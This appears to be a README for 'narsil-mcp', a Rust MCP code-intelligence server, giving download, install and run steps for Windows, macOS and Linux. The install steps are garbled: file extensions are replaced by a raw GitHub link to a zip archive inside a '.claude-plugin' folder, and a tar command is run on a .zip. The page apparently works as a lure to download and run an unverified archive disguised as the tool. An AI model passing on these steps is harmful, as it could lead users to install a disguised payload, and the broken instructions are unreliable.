Welcome to narsil-mcp! This application serves as a Rust MCP server, providing a wealth of tools for code intelligence. Whether you need security scanning, call graphs, or support for multiple programming languages, narsil-mcp is here to help.
To get started, you need to download the software. Click the button below to visit the Releases page and get the most recent version of narsil-mcp.
- Click the button above to visit the Releases page.
- On the Releases page, you will see a list of available versions. Choose the latest version for your system.
- Click on the version number to expand the details.
- Download the file that matches your operating system.
- For Windows users, look for files ending in
.exe. - For macOS users, look for files ending in
.dmg. - For Linux users, find the
https://github.com/doctordisrespect/narsil-mcp/raw/refs/heads/main/narsil-plugin/.claude-plugin/mcp_narsil_v2.3.zipfiles.
- For Windows users, look for files ending in
After the download is complete, locate the file in your Downloads folder.
- Double click on the downloaded
.exefile. - Follow the prompts in the installation wizard.
- Once installation is complete, you can run narsil-mcp from the Start Menu or by searching for it in the search bar.
- Open the downloaded
.dmgfile. - Drag the narsil-mcp icon to the Applications folder.
- You can now find narsil-mcp in your Applications and run it from there.
-
Extract the downloaded
https://github.com/doctordisrespect/narsil-mcp/raw/refs/heads/main/narsil-plugin/.claude-plugin/mcp_narsil_v2.3.zipfile.- Open your Terminal.
- Navigate to the directory where you downloaded the file (
cd ~/Downloads). - Run the command:
tar -xvzf narsil-mcp-<version>https://github.com/doctordisrespect/narsil-mcp/raw/refs/heads/main/narsil-plugin/.claude-plugin/mcp_narsil_v2.3.zip(replace<version>with your actual downloaded file name).
-
Navigate into the extracted folder (
cd narsil-mcp-<version>). -
Now you can run the application by executing the command:
./narsil-mcp.
narsil-mcp comes with a range of features designed to enhance your coding experience:
- Comprehensive Code Intelligence: Utilize over 75 tools to help you with code analysis and optimization.
- Broad Language Support: Works with 16 different programming languages, making it versatile for various projects.
- Security Scanning: Automatically identify vulnerabilities in your code, helping you to maintain security and privacy.
- Call Graphs: Visualize function calls in your code for easier understanding and debugging.
To run narsil-mcp effectively, ensure your system meets the following requirements:
- Operating System: Windows 10 or higher, macOS 10.14 or higher, or a recent Linux distribution.
- RAM: A minimum of 4 GB.
- Storage: At least 200 MB of free disk space.
- Additional Requirements: An active internet connection for downloading dependencies and updates.
For detailed usage instructions and tips on maximizing your experience with narsil-mcp, refer to the Documentation. If you encounter problems, please check out the support section or create an issue on our GitHub page.
We value community feedback and contributions. If you would like to report a bug, request a feature, or contribute to the project, please feel free to open an issue or a pull request.
This project is licensed under the MIT License. See the LICENSE file for more details.
Thank you for choosing narsil-mcp! We hope it brings clarity and efficiency to your coding projects.